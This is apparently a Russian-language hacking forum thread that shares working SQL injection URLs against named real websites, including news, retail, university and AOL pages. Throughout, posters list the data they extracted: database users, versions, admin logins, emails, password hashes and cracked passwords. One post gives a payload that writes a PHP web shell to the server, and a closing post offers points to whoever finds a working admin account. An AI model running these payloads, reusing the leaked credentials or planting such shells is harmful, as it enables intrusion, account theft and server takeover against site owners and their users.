SQL Инъекции

5.0.22:alinalexie@localhost:efitness

http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+concat_ws(0x3a,version(),user()),2,3,4,5,6/*

 

loginass / billie:eakin brian:c@nd1@ linfra:linfra

http://worldcondos.com/viewdetails.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+registered/*​

 

4.1.20:f7igqei2emj0@localhost

http://www.e-dereham.info/viewdetails.php?section=public&id=-1+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14/*​

 

4.1.11:dcautos@localhost:dcautos

http://www.dc-autos.com/viewdetails.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*​

 

phpbuddy.com

phpbud22_phpbudd@localhost:hpbud22_phpbuddy::4.1.21-standard

 

Code:

http://www.tooltime.nl/pagina.php?id=-2+union+select+1,2,concat(id,0x3a,name)+from+admin/*

 

.еда
classes.design.ucla.edu

Code:

http://classes.design.ucla.edu/Fall05/28/index_visor.php?id=3&ejercicio_id=15&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8+--+

5.0.22:[email protected]:F0528
west.stanford.edu

Code:

http://west.stanford.edu/cgi-bin/pager.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5+--+

5.0.45-3-log:[email protected]:g_west_west

 

kniga-market.kiev.ua

HTML:

http://www.kniga-market.kiev.ua/producers.php?category=1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*

USER:u_knigamarke@localhost
VERSION:4.1.22
DATABASE:knigamarket

 

ability.aol.com

Code:

http://ability.aol.com/ability/index.php?ID=45&catID=-6+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1)

4.1.14-standard-log:[email protected]:aol_ability

 

HelO

http://www.topfitness.ro

USER
SORS

pass hash MYSQL
255B543308FCC38F

admin panel
http://www.topfitness.ro/admin/

​

 

good

from name (USER) ​

 

Excellent work

Continued

use name
Usama

password hash
dcddb75469b4b4875094e14561e573d8


end password is

Tigger You are excellent
​

 

HTML:

http://www.archaeolog.ru/index.php?id=2&id_nws=58+UNION+SELECT+1,2,3,4,concat(login,0x3a,pass,0x3a,email),6,7,8,9,10+FROM+userdata+LIMIT+1,1/*

Там же columns:
id, pid, fio, stepen, dolshnost, bio, login, pass, email, telephon

 

Боян! Причем ты уже не первый кто за сегодня инъект на труде выкладывает =\\

 

http://baltbay.com/index.php?bloks=2&sad=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

http://backipars.lv/kipars/index.php?sadala=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

http://jauniesivero.lv/index.php?page=news&section=-1/**/union/**/select/**/11111,22222/**from/**/user

http://hostelturiba.lv/index.php?lang=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

 

www.unbureauenplus.fr

Code:

http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*

5.0.44-log:[email protected]:unbureau_base1

Code:

http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,pseudo,passe),2,3+from+papa_admin/*

логин:пасс
omi:1905

 

login:Usama
hash пароля:dcddb75469b4b4875094e14561e573d8
пароль:00000

Можешь залить шелл через инжекцию и узнать где админка.
----------------------------------------------------------

ankor.ru

HTML:

http://www.ankor.ru/cityDescr.php3?uid=60&cid=17+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*

USER:[email protected]
VERSION:4.0.27-log
DATABASE:ankor

 

http://www.trizland.ru/task.php?id=-11+union+select+1,2,3,4,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),6,7,8,9/*

4.1.18/bin17www/[email protected]

-----------------------------------------------------------------------------

all-news.ru


http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*

5.0.45-log/u15215_2/[email protected]


http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,username,password,contact_email,contact_icq),3,4,5,6,7+from+u15215.zp_partners/*

логин/пароль/мейл/уин
runet/261072/[email protected]/


http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,login,password,email,authkey),3,4,5,6,7+from+u15215.users/*

логин/пароль/мейл/код авторизации
BaDGiRL/1791179/[email protected]/

 

HTML:

http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>'+,4,5from+user+into+outfile+'/home/site/html/shell.php'/*

Такой запрос создаст шелл в директории "/home/site/html/"

----------------------------------------

cavs.msstate.edu

HTML:

http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4/*

USER:[email protected]
VERSION:5.0.24a-standard
DATABASE:webdata

Таблицы -

HTML:

http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Table_name),4+from+information_schema.tables/*

Колонны -

HTML:

http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Column_name),4+from+information_schema.columns/*

 

Код:

http://www.odin-torg.com/catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1/*&cat=

5 мускул,есть 3 бд с паролями админов,сайт сам фигня,но интересно другое а именно CMSка

p.s ни один пароль к админке не подходит,кто найдет акк с доступом тому от меня плюсики